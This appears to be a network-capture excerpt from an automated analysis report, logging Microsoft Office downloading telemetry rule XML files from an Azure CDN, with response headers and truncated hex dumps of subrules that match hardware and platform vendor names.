                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:15 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 423
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3b8b6251-d01e-0049-3c33-44e7dc000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010015Z-174f78459684bddphC1EWRbht400000016a000000000t3vn
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:15 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    37192.168.2.64974413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:16 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 7eb0f396-d01e-0066-0ac6-45ea17000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010016Z-174f7845968xr5c2hC1EWRd0hn0000000rfg00000000n91a
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    38192.168.2.64974313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:16 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 478
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 9009c19b-701e-0053-74c6-453a0a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010016Z-174f7845968n2hr8hC1EWR9cag000000168g00000000nfv9
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    39192.168.2.64974513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:16 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: cdcb5222-c01e-0014-44bd-42a6a3000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010016Z-174f7845968ljs8phC1EWRe6en00000016p00000000020gs
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:16 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    40192.168.2.64974613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:17 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:17 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 400
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 00b51f18-a01e-000d-6fcc-45d1ea000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010017Z-174f7845968jrjrxhC1EWRmmrs00000016ug00000000c981
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:17 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    41192.168.2.64974713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:17 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:18 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010018Z-174f7845968jrjrxhC1EWRmmrs00000016xg000000004ccf
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:18 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    42192.168.2.64974913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:18 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:18 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 475
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 935017b2-001e-0017-80c6-450c3c000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010018Z-1746fd949bd77mkmhC1EWR5efc00000000rg00000000dbs3
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:19 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    43192.168.2.64974813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:18 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:18 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 425
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: be2d73de-001e-002b-2f62-4399f2000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010018Z-174f7845968ljs8phC1EWRe6en00000016hg00000000cddy
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:19 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    44192.168.2.64975013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:18 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:19 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 448
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 21673337-d01e-00a1-71b2-4235b1000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010019Z-174f7845968ljs8phC1EWRe6en00000016f000000000pu84
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:19 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
